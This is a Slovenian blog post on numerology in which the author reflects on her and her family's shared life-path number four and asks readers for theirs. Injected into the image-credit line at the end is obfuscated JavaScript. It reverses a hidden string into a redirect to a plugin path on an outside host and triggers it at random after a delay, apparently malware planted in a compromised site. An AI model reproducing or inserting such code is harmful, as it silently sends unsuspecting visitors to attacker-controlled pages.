Življenska pot št. 4

Ne spoznam se na numerologijo, ampak vem številko svoje življenske poti. To je številka štiri.

Veste kaj je zanimivo? Enako življensko pot imajo tudi moj oče, sestra, brat in moj sin. Vsi imamo modre oči in vsi imamo enako znamenje nekje na telesu. Na hrbtu ali stegnu.

Zakaj je zame še posebej pomembno, da osvojim moč številke štiri? Kaj nam o življenju pove ta številka? Kaj naj bi mi prinašala?

No, številka štiri naj bi pomenila, da dobro dokončam stvari in rada delam. Rutina mi naj ne bi predstavljala večjih težav in ob njej mi delo dobro steče. Resnica je čisto nasprotna. Kljub temu, da te informacije vem že kar nekaj časa, se mi je vse skupaj zdelo preveč neumno, ker ni bilo res. Zdaj pa vidim, da je ravno tukaj problem. Ni bilo res, ker se nisem sinhronizirala z njo. Ker se nisem dovolj trudila in nadaljevala delo tudi takrat, ko se mi resnično ni dalo. Vse skupaj je ravno obratno od tistega kar piše in zato se moram resnično bolj potruditi.

Zakaj še se moram potruditi?
Drugi razlog tiči v mojem sinu. Njegova številka je 4, prvotna. To je energija, ki jo mora prvo obvladati, da bo lahko resnično uporabil svojo življensko pot. Namreč Mars nima le številke 4, ima številko 22, ki je mojstrska. A za uporabo te mojstrske številke mora znati najprej uporabiti tisto nižje vibracije. Zato je na meni, da se končno uglasim in delam skupaj z energijo, ki sem jo dobila v pomoč pri svojem rojstvu. Zato, da se bo skupaj z mano naučil tudi moj sin in bo dejansko lahko stopil korak naprej.

Mi je pa res zanimivo, da imamo vsi enako število. Očitno se moramo učiti drug od drugega.

V katero število pa si bil rojen ti?

(27.6.1996=2+7+6+1+9+9+6=40=4)

Samo v razmislek z Ljubeznijo;
(Ni)Si

Prikazana slika:$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/number-four?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

No Comments